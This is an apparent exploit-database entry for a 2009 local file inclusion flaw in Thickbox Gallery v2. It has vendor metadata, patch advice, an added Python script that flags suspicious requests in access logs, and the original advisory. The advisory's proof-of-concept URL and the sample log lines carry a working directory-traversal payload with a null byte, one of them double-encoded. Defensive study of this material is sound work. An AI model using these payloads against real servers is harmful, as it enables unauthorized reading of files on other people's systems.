Vendor: Thickbox Gallery v2
By: SirGod
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Thickbox Gallery v2
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Thickbox Gallery v2 Local File Inclusion Vulnerability

A proof-of-concept (PoC) exploit for a local file inclusion vulnerability in Thickbox Gallery v2 was published. The vulnerability is triggered by a request to the vulnerable server whose URL carries a maliciously crafted parameter, which causes the application to include a file from the local file system, such as BOOTSECT.BAK.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Thickbox Gallery v2.
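
For detection, web server access logs can be searched for the request shape shown in the PoC: directory traversal and a %00 null byte in the ln parameter of index.php. The Python code below is an added example, not code from the vendor or the original advisory. The log lines, addresses and the /gallery/ path are constructed, and it assumes that legitimate ln values are short language codes.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (common log format); addresses and paths are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Apr/2009:10:00:01 +0000] "GET /gallery/index.php?ln=en HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Apr/2009:10:00:07 +0000] "GET /gallery/index.php?ln=../../../../../../BOOTSECT.BAK%00 HTTP/1.1" 200 512',
    '203.0.113.9 - - [27/Apr/2009:10:00:09 +0000] "GET /gallery/index.php?ln=%252e%252e%252fBOOTSECT.BAK%2500 HTTP/1.1" 200 512',
    '198.51.100.2 - - [27/Apr/2009:10:01:00 +0000] "GET /gallery/index.php?ln=fr&page=2 HTTP/1.1" 200 4800',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ln values are short language codes such as "en" or "pt-BR".
ALLOWED_LN = re.compile(r'[A-Za-z]{2,3}(?:[-_][A-Za-z]{2,4})?')


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_ln(line):
    """Return the reasons a request's ln parameter looks like a file-inclusion attempt."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    reasons = []
    # parse_qs already decodes once; fully_decode handles further encoding layers.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    for raw in params.get("ln", []):
        value = fully_decode(raw)
        if "../" in value or "..\\" in value:
            reasons.append("traversal")
        if "\x00" in value:
            reasons.append("null-byte")
        if not reasons and not ALLOWED_LN.fullmatch(value):
            reasons.append("unexpected-value")
    return reasons


def scan(lines):
    """Return (client address, reasons) for every flagged line."""
    return [(l.split()[0], r) for l in lines if (r := check_ln(l))]
```

Calling scan(SAMPLE_LOG) flags the two requests from 203.0.113.9, including the double-encoded one, and leaves the ln=en and ln=fr requests alone.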

Exploit-DB raw data:

##########################################################################################
[+] Thickbox Gallery v2 Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

   PoC :
    http://127.0.0.1/[path]/index.php?ln=../../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]